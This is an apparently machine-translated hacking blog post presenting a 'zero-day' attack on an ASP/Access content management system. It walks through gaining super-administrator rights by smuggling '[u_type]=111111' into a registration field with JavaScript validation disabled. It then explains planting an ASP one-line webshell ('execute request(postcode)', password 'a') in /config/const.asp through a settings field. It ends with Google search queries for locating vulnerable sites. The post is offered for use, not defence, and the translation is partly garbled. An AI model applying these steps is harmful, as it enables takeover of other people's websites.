Western Digital ODAY killer Vulnerability

From baiyunyunyunyunbaiyun S Blog

Let's talk about the usage method directly.

When registering a member, enter "Chinese character, [u_type] = 111111" (Note: it does not contain double quotation marks) in "Chinese name of the applicant ).

Fill in other items as usual, and then register.

After registration, go to the personal data modification page.

In this case, disable JS because there is a lot of trouble with verification. After disabling it, click the "Update" button. A message is displayed, indicating that the personal data is successfully modified.

Log out and log on again. You are the super administrator.

Let's talk about WEBSHELL in the background.

Because of the ACCESS site, using SHELL in the background is nothing more than backing up, restoring the database, writing configuration files, uploading spoofing, or IIS6 parsing problems.

The back-end of this system can use the backup database, but it is quite troublesome. This is not described here.

This document only describes how to write the configuration file to get the SHELL, and does not analyze the code.

Go to the background and find the system settings. All the modification options are not provided here. We need to change them by ourselves.

Find a field and change its name value to reguser_level. It is a numeric type in the configuration file. We can only change the value of the numeric type, the string values are all filtered out in double quotes, so we cannot use them.

Change the value to 1: execute request (postcode)

Then change the zip code to. Save. In this way, the trojan is written into/config/const. asp.

If the password is a, connect to the client directly ..

By Ninty
Google: inurl: news/list. asp? Newsid =
Inurl: faq/list. asp? Unid =

Animation download: http://www.virusest.com/bbs/viewthread.php? Tid = 54 & extra = page % 3D1